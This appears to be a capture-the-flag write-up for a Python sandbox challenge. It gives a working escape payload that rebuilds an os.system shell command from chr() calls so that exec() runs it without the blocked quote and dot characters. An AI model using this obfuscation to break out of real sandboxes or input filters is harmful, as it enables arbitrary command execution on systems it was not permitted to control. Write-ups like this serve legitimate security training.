This is a python sandbox challenge.

By inputting some characters, we can identify few Illegal characters:

[]._'"

But luckily () is allowed, looking at locals(), we can see exec() is allowed.

exec() required string argument but unfortunately '" were restricted. However, we found out that chr() is allowed, so let’s create our payload:

Original payload:

exec("__import__('os').system('cat flag')")

Payload crafted to bypass restrictions:

exec(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41))

Execute it and got the flag!

Flag:

flag{vuln3r4b1l17y_45_4_53rv1c3}